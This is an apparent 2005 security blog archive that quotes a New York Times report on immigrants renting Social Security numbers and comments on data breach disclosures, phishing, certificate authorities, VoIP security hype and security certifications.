    These days, most immigrants working unlawfully buy a document combo for $100 to $200 that includes a fake green card and fake Social Security card with a nine-digit number plucked out of thin air. "They'll make it for you right there at the flea market," said David Blanco, an illegal immigrant from Costa Rica who works as an auto mechanic in Stockton, Calif.

    This process has one big drawback, however. Each year, Social Security receives millions of W-2 earning statements with names or numbers that do not match its records. Nine million poured in for 2002, many of them just simple mistakes. In response the agency sends hundreds of thousands of letters asking employers to correct the information. These letters can provoke the firing of the offending worker.

    Working with a name linked to a number recognized by Social Security - even if it is just borrowed or leased - avoids these pitfalls. "It's the safest way," said Mario Avalos, a Stockton accountant who every year does tax returns for dozens of illegal immigrants. "If you are going to work in a company with strict requirements, you know they won't let you in without good papers."

    While renting Social Security numbers makes up a small portion of the overall use of false papers, those with close ties to the immigrant communities say it is increasingly popular. "It used to be that people here offered their number for somebody to work it," said Mr. Mora in Tlalchapa. "Now people over there are asking people here if they can use their number."

    Since legal American residents can lose their green cards if they stay outside the country too long, for those who have returned to Mexico it is useful to have somebody working under their identity north of the border.

    "There are people who live in Mexico who take $4,000 or $5,000 in unemployment in the off season," said Jorge Eguiluz, a labor contractor working in the fields around Stockton, Calif. "They just lend the number during the season."

    The deals also generate cash in other ways. Most identity lending happens within an extended family, or among immigrants from the same hometown. But it is still a hard-nosed transaction. Illegal immigrant workers usually earn so little they are owed an income tax refund at the end of the year. The illegal immigrant "working the number" will usually pay the real owner by sharing the tax
    refund.

    "Sometimes the one who is working doesn't mind giving all the refund, he just wants to work," said Fernando Rosales, who runs a shop preparing income taxes in the immigrant-rich enclave of Huntington Park, Calif. "But others don't, and sometimes they fight over it. We see that all the time. It's the talk of the place during income tax time."

    Done skillfully, the underground transactions are virtually undetectable. They do not ring any bells at the Social Security Administration. Nor do they set off alarms at the Internal Revenue Service as long as the person who lends the number keeps track of the W-2's and files the proper income tax returns.

    In a written response to questions, the audit office of Social Security's inspector general acknowledged that "as long as the name and S.S.N. on an incoming wage item (i.e., W-2) matches S.S.A.'s record" the agency will not detect any irregularity.

    The response noted that the agency had no statistics on the use of Social Security numbers by illegal immigrants. It does not even know how many of the incorrect earnings reports it receives every year come from immigrants working unlawfully, though immigration experts estimate that most do.

    Meanwhile, with the Homeland Security Department focused on terrorism threats, it has virtually stopped policing the workplace for run-of-the-mill work violations. Immigration and Customs Enforcement arrested only 450 illegal immigrants in the workplace in 2003, down from 14,000 in 1998.

    "We have seen identity fraud," said John Torres, deputy assistant director for investigations. But "I haven't heard of the renting of identities."

    Immigrants on both sides of the transactions are understandably reluctant to talk about their participation.

    A 49-year-old illegal immigrant from Michoacan who earns $8.16 an hour at a waffle factory in Torrance, Calif., said that she had been using a Social Security number she borrowed from a friend in Mexico since she crossed illegally into the United States 15 years ago. "She hasn't come back in this time," the woman said.

    There are risks involved in letting one's identity be used by someone else, though, as Mr. Luviano, the beekeeping instructor, learned through experience.

    Mr. Luviano got his green card by a combination of luck and guile. He says he was on a short trip to visit his brother in California when the 1986 immigration law went into effect and the United States offered amnesty to millions of unauthorized workers.

    Three million illegal immigrants, 2.3 million of them from Mexico, ultimately received residence papers. Mr. Luviano, who qualified when a farmer wrote a letter avowing he had worked for months in his fields, was one. Once he had his papers, though, he returned to Tlalchapa.

    He has entered the United States several times since then, mostly to renew his green card. But in the early 1990's, concerned that long absences could put his green card at risk and spurred by the chance to make a little extra money, he lent his Social Security number to his brother's friend. "I kept almost all the income tax refund," Mr. Luviano said.

    Mr. Luviano decided to pull the plug on the arrangement, however, when bills for purchases he had not made started arriving in his name at his brother's address. "You lend your number in good faith and you can get yourself in trouble," he said.

    But Mr. Luviano is itching to do it again anyway. He knows that Social Security could provide retirement income down the line. And there's always the tax refund.

    "I haven't profited as much as I could from those documents," he said ruefully.

    Copyright 2005 The New York Times Company
    http://www.nytimes.com/2005/06/07/business/07immigrant.html

    Posted by iang at 09:51 AM | Comments (5) | TrackBack

    May 27, 2005

    Loss Expectancy in NPV calculations

    Mr WiKiD does some hypothetical calculations to show that using some security solutions could cause more costs than benefits, as everything you add to your systems increases your chances or loss.

    Is that right? Yes, any defence comes with its own weaknesses. Further, defences combine to be stronger in some places and weaker in others.

    Building security systems is like tuning speaker systems (or exhaust mufflers on cars). Every time we change something, the sound waves move around so some strengths combine to give us better bass at some frequencies, but worse bass at others. If we are happy to accept the combination of waves at some frequencies and are suppressing the others through say heavy damping, then that's fine. If not we end up with a woefully misbalanced sound.

    Security is mostly done like that, but without worrying about where the weaknesses combine. That's probably because the sets of ears listening to security isn't ours, it's the attackers.

    So, getting back to WiKiD's assumptions, he added in the Average Annual Loss Expectancy (AALE) into his NPV (Net Present Value) calculations, and because this particular security tool had a relatively high breach rate, the project went strongly negative.

    Bummer. But he hones in on an interesting thought - we need much more information on what the Loss Expectancy is for every security tool. Hypothetically I muse on that in a draft paper, and after writing on what the results of such issues are, I can see an immediate issue: how are we going to list and measure the Loss Expectancy product by product, or even category by category?

    Posted by iang at 10:03 PM | Comments (2) | TrackBack

    America asks "Why us?"

    Adam points to something I've been stating for a year or more now and a day: why is the current security crisis happening in USA and not elsewhere, asks a nervous troll on Bruce Schneier's blog:

    This isn't intended as a troll, but why is it that we never hear about this sort of problem in Europe? Is it because we simply don't hear about overseas breaches, or do the European consumer and personal privacy laws seem to be working? How radical a rethink of American buisness practices would be required if we _really_ did own our personal data....

    Posted by: Anonymous at May 24, 2005 09:41 AM

    Go figure. If you need to ask the question, then you're half way to the answer - start questioning the crap that you are sold as security, rights to easy credit, and all the other nonsense things that those who sell thrust down consumers' throats. Stop accepting stuff just because it sounds good or because the guy has a good reputation - why on earth does any sane person think that a social security number is likely to protect a credit system?

    Adam also points to an article in which Richard Clarke, one time head of DHS, points out that we should plan for failure. Yes indeed. Standard systems practice! Another thing you shouldn't accept is that you just got offered a totally secure product.

    With most of the nation's critical infrastructure owned by private companies, part of the onus falls to companies' C-level executives to be more proactive about security. "The first thing that corporate boards and C-level officials have to accept is that they will be hacked, and that they are not trying to create the perfect system, because nobody has a perfect system," he says.

    In the end, hackers or cyberterrorists wanting to infiltrate any system badly enough will get in, says Clarke. So businesses must accept this and design their systems for failure. This is the only sure way to stay running in a crisis. It comes down to basic risk management and business continuity practices.

    "Organizations have to architect their system to be failure-tolerant and that means compartmentalizing the system so it doesn't all go down... and they have to design it in a way that it's easy to bring back up," he says.

    Relying too heavily on perimeter security and too little on additional host-based security will fall short, says Clarke. Organizations, both public and private, need to be much more proactive in protecting their networks from internal and external threats. "They spend a lot of money thinking that they can create a bullet-proof shield," he says. "So they have these very robust perimeters and nothing on the inside."

    It's a long article, the rest is full of leadership/proactive/blah blah and can be skipped.

    And Stefan rounds out today's grumbles with one about one more security product in a long list of them. In this case, IBM has (as Stefan claims) a simplistic approach - hash it all before sharing it. Nah, won't work, and won't scale.

    Even IBM's notions of salting the hashes won't work, as the Salt becomes critical data. And once that happens, ask what happens to your database if you were to reinstall and lose the Salt? Believe me, it ain't pretty!

    Posted by iang at 02:49 PM | Comments (0) | TrackBack

    May 11, 2005

    FUDWatch - VoIP success attracts the security parasites

    VoIP has been an unmitigated success, once Vonage and Skype sorted out basic business models that their predecessors (remember SpeakFreely, PGPFone?) did not get right. And everyone loves a story of connivery and hacker attacks. Now the security industry is ramping up to create Fear, Uncertainty and Doubt - better off known as FUD - in the VoIP industry.

    "As VoIP is rolled out en masse, we're going to see an increased number of subscribers and also an increased number of attackers," says David Endler, chairman of the VoIP Security Alliance (VOIPSA), a recently formed industry group studying VoIP security.

    Consider FUD as the enabler for a security tax. We can't of course collect the revenues we deserve unless the public fully understands what dangers they are in, surely? Right? Consider these past disastrous precedents:

    The VoIP experience could parallel the Wi-Fi example. As Wi-Fi began to gain momentum a few years ago, an increasing number of vulnerabilities came to light. For example, unencrypted wireless traffic could be captured and scanned for passwords, and wireless freeloaders took advantage of many early networks that would let anyone sign in. At first, Endler says, only the technological elite could take advantage of security holes like these. But before long the "script kiddies"--those who lack the skills to discover and exploit vulnerabilities on their own, but who use the tools and scripts created by skilled hackers--joined in.

    Kick me for being asleep, but that's another FUD case right there. The Wi-Fi evolution has been one of overwhelming benefit to the world, and even in the face of all these so-called vulnerabilities, actual bona fide verified cases of losses are as rare as hen's teeth.

    In all seriousness, we've been through a decade of Internet security now and it's well past time to grow up and treat security as an adult subject. What's the threat? Someone's listening to your phone call? Big deal, get an encrypted product like Skype. Someone's DOSing your router? Wait until they go away.

    There just doesn't seem to be an economic model to threats. We know that phishing and spam are fundamentally economic. We know that cracking boxes was for fun and education, originally, and now is for the support of phishing and spam. Regardless of the exception to the economics motive found in hacking and cracking there has to be a motive and listening in to random people's phone calls just doesn't cut it.

    Addendum. Ohmygawd, it gets worse: Congress is asked to protect the Internet for VoIP. Hopefully they are busy that day. Hmm, looks like the wire services have censored it. Try this PDF.

    Posted by iang at 08:30 AM | Comments (3) | TrackBack

    May 03, 2005

    Security as a "Consumer Choice" model or as a sales (SANS) model?

    In thoughts about how to do Internet security - something the world fails at dismally for the present time - it is sometimes suggested that a "consumer choice" model would work. This model sets up independent non-profit organisations that conduct unbiased reports on products. They promulgate strict rules designed to ensure their independence, such as the separation of advertising revenue or even not taking money for advertising at all. (Will's history lesson)

    By way of example, in today's Lighthouse, The Independent Institute suggests that the american Food and Drug Administration ("FDA") should be replaced with this model:

    "If aspirin were invented today, the U.S. Food and Drug Administration might not approve it. We should keep this in mind when thinking about Vioxx, Bextra and other pain-relief drugs that have recently been taken off the market. This is not to say that the new pharmaceuticals are “safe,” but rather that all pharmaceuticals involve tradeoffs. The real question is: who is to make those tradeoffs, patients and doctors or the FDA?"

    There are already plenty of security groups and more pop up every year, but they are generally platforms for sales. SANS for instance just released an update for its top 20 threats (but still doesn't mention phishing as a threat, confirming its status as a dinosaur).

    From historical pre-Internet times, the list divides the threats into a top 10 list for Microsoft and a top 10 for Unix. Reading the Microsoft list gives the overwhelming impression that it is sanitised and softened. The clue is the use of brand - when being critical, the wrong terminology is used. So, we find that "Windows" has a bug, which aside from confusing me as to whether my X Windows or my KDE windows or Mac's windows have an issue, avoids the obviously harsher connotations of the correct brand of "Microsoft Windows."

    Why? Fear of offending companies. SANS is really a seller of conferences, as one can see from the front page, it is not an independent security organisation. And conferences are attended by companies, not by individuals. Better not offend a very large company then.

    Which brings up the problem with the "consumer choice" model - what is the revenue model? How are all these reports to be funded? Thinking about the old model, magazine sales created the revenue, but that doesn't work today because the net operates at zero marginal cost.

    So maybe we need to turn to net models of cooperation, and create an open source-like culture of security reports? Would it be possible to craft a set of criteria for security reports where the product was covered by Creative Commons licence, any group could create one and a few volunteers sit in the middle and mentor and collate?

    An intriguing thought. People are doing the work anyway; why not publish it and share the benefit? Throw in a reputation system to stop Microsoft from inserting their own "SANS report" and we're away. Would it work? I don't know, but it's at least worth a second cup of coffee.

    Addendum: the comments below remind me of Will's history lesson. Well worth reviewing as it sets the scene for the wider discussion.

    #2 Whoops, spoke to soon. The press release from SANS actually uses the proper brand names and gives Microsoft a bad rep. Good one!

    Posted by iang at 06:17 AM | Comments (5) | TrackBack

    April 07, 2005

    Cubicle adds to Security Research on Skype

    Cubicle packaged up the available analysis on Skype and came up with a bunch of risks which the spreading VoIP app imposes on the poor corporate victims of free telecoms. The bottom line was that the risks remain low; although Cubicle didn't say that. Score 3 points for Jedi Knights of the Crypto Rebellion, taking their score to 4.

    I said more about how low risk Skype is to security a while back (click on Jedi above), and stirred up a storm of controversy. That's because I treat security from a statistical and opportunistic fashion: if it improves the situation then that's .. an improvement. That's good, by definition. If it ain't there, that's not an improvement, by definition. So if you don't use a crypto product because it has some unvalidated weakness, then by definition you have reduced your security. That's bad.

    The really great news is that if Cubicle and others can find a problem and actually validate a risk, then Skype will probably fix it, and that'll be yet another improvement, right there! Our cup runneth over! Go Cubicle!

    Addendum: reading late last night, and now that I've actually read one article, there is a risk pointed to there, which is that Skype could be used to deliver spyware, and apparently the Kazaa cousins were already spotted doing that... One worth watching, but this remains an unvalidated risk. I haven't had time to read the other pdf yet.

    Posted by iang at 03:07 PM | Comments (3) | TrackBack

    March 30, 2005

    Security Signals - Schneier reviews Ciphire email system

    Poking around on Ciphire's website I discovered a review by Bruce Schneier on the architecture. It follows on from an earlier one by Russ Housley and Niels Ferguson Here's some meta-comments on the second review.

    Firstly, Bruce indicates that the system is vulnerable to an MITM based on the attacker attempting to insert false reply information, and then redirecting the user to email back to an address/key he happens to have. Bruce says this is hard to deal with, but I wonder about that: this is what SSH defends against. If the client can keep track of the certs it has downloaded, surely it should be able to warn of changes, either by history tracking or user labelling (petnames, logos etc). Indeed, it seems that a lot of the other later attacks can be dealt with by not trusting the PKI every time it says "trust me."

    Secondly, Bruce talks about the insider code injection attack. Yes, tough one. Publishing the code the code - which Ciphire have indicated they will do - helps there, and as mentioned this is _necessary but not sufficient_ as eyeballs are limited even then.

    But there are further steps that will be left undone - Open Sourcing, Open Standards and Open Compeittion. Open source walks hand in hand with open standards. And open standards encourage competing implementations. Here, we see the often bitter and twisted relationship between the PGP Inc and GnuPG teams - which we cheer and applaud as while they are fighting each other, their code is getting better and better and more and more secure.

    No such luck for Ciphire; even when they publish the source, it would take a masochist of maniacal proportions to download it, print it and start reading it. I well remember Lucky Green walking into HIP with boxes and boxes of PGP source. And I do mean boxes, a figure of 20 sticks in my mind and I have no idea why. A team of about a dozen of us worked for about 2 days flat out to finish the last 1% of the errors in the source scanning. And we didn't have time to dally on this comment or that buffer overflow...

    So Ciphire aren't going to see as much benefit from the publication of their source as they might hope, but for all that it certainly adds to the confidence if they do publish.

    Thirdly, what's the _security signal_ with posted reviews? Well, it's all well and good that someone famous did a review. That's presumably for money, and any crypto guy knows you get what you pay for. That's grand, but what strikes is not the review, but the problems found. Problems were found - see above - and Ciphire still printed the review!

    So I propose a new signal: disclosure of own shortfalls, weaknesses, attacks. As Ciphire has gone ahead and published a critique with lines of attack within it, they've drawn out the worst that can happen to them. This does more than just give slashdotters something to get excited over, it actually tells the world where the security stops. That's a valuable thing.

    Posted by iang at 02:15 AM | Comments (2) | TrackBack

    March 29, 2005

    Security Signals - Certifications for Experts

    Some people swear by them. Others think they are just paper. What are they really? I am minded to the Stigler observation, that, paraphrased, all certifications are eventually taken over by their stakeholders. Here is a Register article that bemoans one such certification dropping its practical test, and reducing it to boot camp / brain dump status.

    I have no certifications, and I can declare myself clearly on this: it would be uneconomic for my own knowledge to obtain one. Frankly, it is always better to study something you know little of (like an MBA) than something you already know a lot of (like how to build a payment system, the pinnacle of security problems because unlike other areas, you are guaranteed to have real threats) .

    I recently looked at CISSP (as described in the above article). With some hope, I downloaded their PDF, after tentatively signing my life away because of their fear of revealing their deepest security secrets to some potential future student. Yet what was in the PDF was ... less than in any reasonable half-dozen articles in any net rag with security in their name. Worse, the PDF finishes with a 2 or 3 page list of references with no organisation and no hope of anyone reading or even finding more than a few of them.

    So in contrast to what today's article suggests, CISSP is already set up to be a funnel for revenue purposes. When a certification draws you in to purchase the expensive training materials then you know that they are on the road to degree mills, simply because they now no longer have a single security goal. Now they have a revenue incentive ... It's only a matter of time before they forget their original purpose.

    Which all leads to the other side of the coin - if an employer is impressed by your certification, then that employer hasn't exactly thought it through. Not so impressive in return; do you really want to do security work for an organisation that has already reduced their security process to one of borrowing other organisations's best practices? (Which leads to the rather difficult question of how to identify an organisation that thinks for itself in security matters. Another difficult problem in security signalling!)

    So what does an employer do to find out if someone knows any security? How does an _individual_ signal to the world that he or she knows something about the subject? Another question, another day!

    Posted by iang at 11:29 AM | Comments (6) | TrackBack

    March 28, 2005

    Mad March of Disclosures - the post-Choicepoint world

    Until recently, security breaches were generally hushed up. A California law (SB1386) to notify victims of losses of identity information came into effect mid 2002, which had the effect of springing a mandated leak in the secrecy of breaches across corporate and government USA.

    At first a steady trickle of smaller breaches garnered minor press attention. Then Choicepoint burst into the public consciousness in February of 2005 due to several factors. This major breach caused not only a major dip in the company's share price, but also triggered the wave of similar revelations (see ID theft is inescapable below for a long list).

    Such public exposure of breaches is unprecedented. Either we have just observed a spike in actual breaches and this is truly Mad March, or the breaches are normal, but the disclosure is abnormal.

    Anecdotal evidence in the security industry supports the latter theory. (One example.) We've always known that massive breaches were happening, as stories have persistently circulated in security circles ever since companies started hooking databases to Internet servers. I feel pretty darn safe in putting the finger on SB1386 and Choicepoint as having changed the way things are now done (and, not to forget Schechter and Smith's FC03 paper which argued for more disclosure).

    (Editorial note: this is posted because I need a single reference to the list of disclosures, rather than a squillion URLs. As additional disclosures come in I might simply add them to the list. For a comprehensive list of posts, see Adam's Choicepoint category. Adam also points at David Fraser's list of privacy incidents. And another list.)


    ID theft is inescapable

    By Thomas C Greene in Washington
    Published Wednesday 23rd March 2005 12:29 GMT

    March 2005 might make history as the apex of identity theft disclosures. Privacy invasion outfit ChoicePoint, payroll handler PayMaxx, Bank of America, Lexis Nexis, several universities, and a large shoe retailer called DSW all lost control of sensitive data concerning millions of people.

    Credit card and other banking details, names, addresses, phone numbers, Social Security numbers, and dates of birth have fallen into the hands of potential identity thieves. The news could not be worse.

    In March 2005 alone:

    California State University at Chico notified 59,000 students, faculty, and staff that their details had been kept on a computer compromised by remote intruders. The haul included names, addresses and Social Security numbers.

    Boston College notified 120,000 of its alumni after a computer containing their addresses and Social Security numbers were compromised by an intruder.

    Shoe retailer DSW notified more than 100,000 customers of a remote break-in of the company's computerized database of 103 of the chain's 175 stores.

    Privacy invasion outfit Seisint, a contributor to the MATRIX government dossier system, now owned by Reed Elsiver, confessed to 32,000 individuals that its Lexis Nexis databases had been compromised.

    Privacy invasion outfit ChoicePoint confessed to selling the names, addresses and Social Security numbers of more than 150,000 people to criminals.

    Bank of America confessed to losing backup tapes containing the financial records of 1.2 million federal employees.

    Payroll outsourcer PayMaxx foolishly exposed more than 25,000 of its customers' payroll records on line.

    Desktop computers belonging to government contractor Science Applications International Corp (SAIC) were stolen, exposing the details of stockholders past and present, many of them heavy hitters in the US government, such as former Defense Secretaries William Perry and Melvin Laird, former CIA Director John Deutch, former CIA Deputy Director Bobby Ray Inman, former Chief Weapons Inspector in Iraq David Kay, and former chief counter-terror advisor General Wayne Downing.

    Cell phone provider T-Mobile admitted that an intruder gained access to 400 of its customers' personal information.

    George Mason University confessed that a remote intruder had gained access to the personal records of 30,000 students, faculty, and staff.

    To which we can add:Department of Homeland Security's Transportation Security Administration, Northwestern University's Kellogg School of Management, Nevada's Department of Motor Vehicles, legal data collector Westlaw, University of Nevada , University of California, Berkeley.

    Posted by iang at 11:34 AM | Comments (3) | TrackBack

    March 25, 2005

    Overzealous sentencing leads to reduction in security

    Yet another disproportionate sentence was handed down for what amounts to a bunch of misdemeanours in the US of A. Adam reports and google has lots of articles on a hacker that spent too much time cracking into various places. In the stated case, he abused access to a customer's site (so it wasn't hacking) and the even the plea submission agreed he didn't do anything with the information:

    "Baas committed a crime when he exceeded his authorized access, looked for and downloaded an encrypted password file, and ran a password cracking program against the file,"
    ,,,
    The statement of facts says Baas illegally obtained about 300 passwords, including one that acted like a "master key" and allowed him to download files that belonged to other Acxiom customers. The downloaded files contained personal identification information. The data stolen by Baas was not used for criminal or commercial purposes.

    The prosecution filed an indirect damages claim of $5.9 million but the chances of that being inflated for effect are high. Against that, the guy was already in the pokey for some other cracks, and he boasted to his buddies about his exploits.

    For that he got 4 years. This is hardle proportional, and the unintended consequences of putting the fear of God and the Federal Penitentiary into systems administrators is likely to be lower overall security: you can "do it by the book,", or you can have security, but you can't have both.

    Posted by iang at 05:11 PM | Comments (0) | TrackBack

    March 18, 2005

    Christopher Allen on the constance of Fear

    We don't often get the chance to do the Rip van Winkle experience, and this makes Christopher Allen's essay on how he returned to the security and crypto field after exiting it in 1999 quite interesting.

    He identifies two things that are in common: Fear and Gadgets. Both are still present in buckets, and this is a worry, says Christopher. On Fear:

    "To simplify, as long as the risks were unknown, we were in a business feeding off of 'fear' and our security industry 'pie' was growing. But as we and our customers both understand the risks better, and as we get better at mitigating those risks cheaply, this "fear" shrinks and thus the entire 'pie' of the security industry becomes smaller. Yes, new 'threats' keep on coming: denial-of-service, worms, spam, etc., but businesses understanding of past risks make them believe that these new risks can be solved and commodified in the same way."

    The observation that fear fed on the unknown risks is certainly not a surprise. But I find the conclusion that as the risks were better understood, the pie shrunk to be a real eye opener. It's certainly correlated, but it misses out a world of causality - fear is and was the pie, and now the pie buyers are jaded.

    I've written elsewhere on what's wrong with the security industry, and I disagree with how Christopher's assumptions, but we both end up with the same question (and with a nod to Adam's question): how indeed to sell a viable real security product into a market where statistically, we are probably selling FUD?

    Addendum: Adam's signalling thread: from Adam: 1, 2. From Iang: 1, 2

    Posted by iang at 11:39 AM | Comments (2) | TrackBack

    March 16, 2005

    Observations on the CA market - Verisign to sell out?

    fm points at developments in the anti-phishing battle (extracted below) only unexpected if you had not an earlier entry on the Crooked Black Claw.

    It seems that Netcraft are having some success in aggregating the information collected from their toolbar community into an early warning sign of where phishers are heading. Reportage from them: online banking is being attacked by cross-site scripting. This is distinct to the traditional phishing in that it does now bring the bank and ecommerce site (note to Niham!) into the loop. Yet only in a small way; close that loophole and that puts the bank out of the defence business again.

    Yet more importantly is the structural shift that is being signalled here.

    Netcraft pushed out their toolbar back in the closing days of 2004. Now they have can use this info, a scant 10 weeks later. This changes the balance of power in cert-based security, and CAs will be further be marginalised by this development. Here's the article followed by more observations:

    Online Banking Industry Very Vulnerable to Cross-Site Scripting Frauds

    Phishing Attacks reported by members of the Netcraft Toolbar
    community show that many large banks are neglecting to take
    sufficient care with the development and testing of their online
    banking facilities.

    Well known banks have created an infestation of application bugs and
    vulnerabilities across the Internet, allowing fraudsters to insert
    their data collection forms into bona fide banking sites, creating
    convincing frauds that are undetectable to most customers. Indeed, a
    personal finance journalist writing for The Motley Fool was brave
    enough to publicly admit to having fallen for a fraud running on
    Suntrust's site and having her current account cleaned out. It's a
    reasonable premise that if a Motley Fool journalist can fall for a
    fraud, anyone can.

    One fraud recently blocked by the Netcraft Toolbar was at Citizens
    Bank. Fraudsters composed and mass mailed a phishing mail which
    exploited a program on CitizensBank.com, loading Javascript from the
    attackers' server hosted at Telecom Italia. Customers were presented
    with a page bearing the CitizensBank.com URL in the address bar,
    while the browser window displays a form from the Telecom Italia
    server asking for user login information.

    The script being exploited allows visitors to search for Citizens
    Bank branch offices in their town. Along with search scripts, branch
    locator pages are frequently carelessly coded and are targets for
    fraudsters who are actively analyzing financial web sites for
    weaknesses.

    Another thought occurred to me. I wrote last night in Mozilla's bug fix forum "There is no centralised database of certs by which a CA can know whether an application for a new cert is likely to conflict (paraphrased)." This is because CAs do not cooperate and will never cooperate at that level (as customer theft will be the obvious result).

    This balkanisation of CAs means that any security fixups must align with those borders. An attack on an ecommerce site using certs will come via another CA. If I was to attack GMail, I wouldn't go to Equifax for my cert, I'd go to Comodo. Or VeriSign, or some other... (And yes, I'd ask for GMall.com and present my forged paperwork for that company. But let's skip over the boring details of how we trick a CA.)

    So it is crucial that the browser shows which CA signed the cert. Along with other things as suggested here by Peter Gutmann, in a discussion on how to detect and discriminate rogue CAs, a priori:

    In other words, this problem [of differentiating between "high" assurance and "low" assurance] is way, way up in the political layer, and I can't see any way of resolving it. It'd certainly be a good idea to make some distinction, but it's not a productive area to apply effort. It'd be better to look at some of the work on secure UI design (e.g. anything by Ka-Ping Yee, Simpson Garfinkel's thesis, etc etc). Work on the stuff that's solveable and leave this one as a honeynet for the bureaucrats to prevent them from causing any damage elsewhere.

    Two other bits that I should mention:

    That will do more for security than any certificate-nitpicking ever will (the anti-phishing list at Gerv's site should be adopted as the #1 - #5 security features to be added to Mozilla/Firefox). After you've implemented those, you can still work on the titanium-plated kryptonite certificate support. Conversely, no amount of diamond-studded iridium certificates will do you any good without anti-phishing/spoofing measures like the above being used.

    Peter.


    If there is a God of Cryptoplumbing, then Peter Gutmann is he, and he has spoken. We now seem to be on our way to a manifesto of ideas. Perhaps we should take that further...

    Getting back to the crucial point here, I claimed there was no centralised database. But, it turns out that there is a database - the net. Sure, it ain't centralised, but (and here's the clanger) it is trawled on a daily basis for certs. By two parties at least that I know of: Netcraft and SecuritySpace. And as a consequence both of these parties have (implied) centralised databases, and have an ability to answer the question "is this new application for a cert likely to be a phishing attack?"

    Now, if you are a net technie, that will likely be a purile observation. But if you are the CEO of a Certificate Authority, then the ground just rumbled under your feet. If these two players can pull this off then the CA just got so marginalised that the commoditisation that we've seen with Comodo and GoDaddy, and also with CACert but in a different direction ... well, all that falls into the class of "you ain't seen nothing yet!"

    Which leads me to my final observation. (Techie warning. What follows is all bizspeak, sorry about that.) As CAs are inevitably marginalised by the above development, and by their failure to protect the net from the arisal of phishing - a direct MITM on the browser - then the big bucks players will rethink their strategy. That of course means Verisign.

    There are two possible paths here. Path One is that the branding opportunities turn up in time (watch Microsoft here) for the CA business to reverse its fortunes and become a media space player. In this scenario, players spend on advertising, and start to build their brands as quality and security (which means they take a proactive approach to watching applications for certs). But they can only do this if a) the branding turns up, b) they can get more investment, and thus c) they can show a massive market increase and thus d) the commody certificate leads to a discriminated market place of much greater size.

    That's not as far off as we think, as part a) also leads to part d) in market terms.

    Then there is Path Two. Phishing gets bigger, and some poor Alice in the US loses her house over it. Her attornies say "this can't go on and we can help you stop it!" (Proving that the USA leads in genetic engineering, their attornies lack any capability to say "I don't know / I can't help you.")

    Boom, class action suit on phishing is filed against the bank, the browser manufacturer, the cert suppliers (both, or all) and to cap things off, the people who designed the system. The potential class size is about 1 million americans, give or take. Total losses are in billions, over a few years. Add punitive damages if it goes badly, and the case showed that the architects should have known better.

    Potential payout is from 100m to 10b, depending. So it is big enough to encourage salivation, but it's also big enough to break any but the bank players (who themselves are just victims so they aren't likely to lie down and die) and Microsoft.

    Now, cast all these ingredients into the pot and what do you have? The cards just got totally reshuffled on the CA business. Which means that the biggest player, Verisign, will have the biggest problem. This is compounded (should I say exponentiated?) by several issues:

    Against that we have an uncertain and never fully monetarised synergy from certs, domains, NetDiscovery and lots of other "strategic control" businesses under the umbrella.

    To me, this says one thing: Verisign will sell the CA business. They will do it to limit the damages from future litigation, and because the ground is shifting too fast for their complex business to benefit from. Further, CAs as "strategic controls" are being marginalised. It's no longer core, and it's darn risky.

    That's my call! Analysts charge top dollar for this - what's your bet?

    Posted by iang at 01:03 PM | Comments (2) | TrackBack

    March 15, 2005

    More Pennies

    Stefan posted a bunch of materials on a phone based ecash system.

    On Identity theft, America's cartoonists are striking back. Click here and then send me your credit card number....

    On the HCI thread of how users view web security, Chris points out that "Simson Garfinkel's dissertation is worth looking at in this context." This relates to the earlier two papers on what users think on web security.

    Scott reports ``Visa International has published a white paper titled "Financial Flows and Supply Chain Efficiency" (sorry, in PDF) authored by Professor Warren H. Hausman of Stanford University.'' It's interesting if somewhat self-serving, and feeds into the whole message is the payment thread.

    Stefan via Adam pointed me to a new blog on risks called Not Bad For a Cubicle. I shall pretend to know what that means, especially as the blogger in question claims knowledge of FC ... but meanwhile, the author takes task with persistent but poor usage of the word security, where 'risks' should be preferred. This makes a lot of sense. Maybe I should change all uses of the word over?

    Because it's more secure becomes ... because it's less risky! Nice. But, wait! That would mean I'd have to change the name of my new paper over to Pareto-risk-free ... Hmm, let's think about this some more.

    Posted by iang at 02:06 AM | Comments (0) | TrackBack

    March 13, 2005

    What users think about web security

    A security model generally includes the human in the loop; totally automated security models are generally disruptable. As we move into our new era of persistent attacks on web browsers, research on human failure is very useful. Ping points to two papers done around 2001 on what web bowsing security means to users.

    Users Conceptions of Web Security (by Friedman, Hurley, Howe, Felten, Nissenbaum) explored how users treat the browser's security display. Unsurprisingly, non-technical users showed poor recognition of spoof pages, based on the presence of a false padlock/key icon. Perhaps more surprisingly, users derived a different view of security: they interpreted security as meaning it was safe to put their information in. Worse, they tended to derive this information as much from the padlock as from the presence of a form:

    "That at least has the indication of a secure connection; I mean, it's obviously asking for a social security number and a password."

    Which is clearly wrong. But consider the distance between what is correct - the web security model protects the information on the wire - and what it is that is relevant to the user. For the user, they want to keep their information safe from harm, any harm, and they will assume that any signal sent will be to that end.

    But as the threat to information is almost entirely at the end node, and not on the wire, users are faced with an odd choice: interpret the signal according to the harms that they know about, which is wrong, or ignoring the signal because it is irrelevent to the harms. Which is unexpected.

    It is therefore understandable that users misinterpret the signals they are given.

    The second paper, User's Conceptions of Risks and Harms on the Web(by Friedman, Nissenbaum, Hurley, Howe, Felten) is also worth reading, but it was conducted in a period of relative peace. It would be very interesting to see the same study conducted again, now that we are in a state of perpetual attack.

    Posted by iang at 10:56 AM | Comments (6) | TrackBack

    March 10, 2005

    Tegam uses courts to signal bad security

    In the ongoing thread of Adam's question - how do we signal good security - it's important to also list signals of bad security. CoCo writes that Tegam, a French anti-virus maker, has secured a conviction against a security researcher for reverse engineering and publishing weaknesses.

    This seems to be a signal that Tegam has bad security. If they had good security, then why would they care what a security researcher said? They could just show him to be wrong. Or fix it.

    There are two other possibilities. Firstly, Tegam has bad security, and they know it. This is the most likely, and their aggressive focus on preserving the revenue base would perhaps lead them to prefer suppression of future researches into the product. CoCo points to a claim that Tegam accused the researcher of being a terrorist in a French advertisement, which indicates an attempt to disguise the suppression and validate it in the minds of their buying public. In French and google translates to quixotic english. Tegam responds that this article makes their case, but comments by flacks do no such thing. However the response makes for interesting reading and may balance their case.

    Alternatively (secondly) they just don't know. And, I don't think we need to show the proof of "don't know" is equivalent to "insecure."

    CoCo also comments on how the chilling effect will raise insecurity in general. But if enough companies decline to pursue avenues of prosecution, this might balance out in our favour: we might then end up with a new signal of those that prosecute and those that do not.

    Texas Instruments recently signalled desire for good security in the RFID breach, as well as an understanding of the risks to the user. Tegam has signalled the reverse. Are they saying that their product has known weaknesses, and they wish to hide these from the users? You be the judge, and while you're at it, ponder on which side of this fence your own company sits?

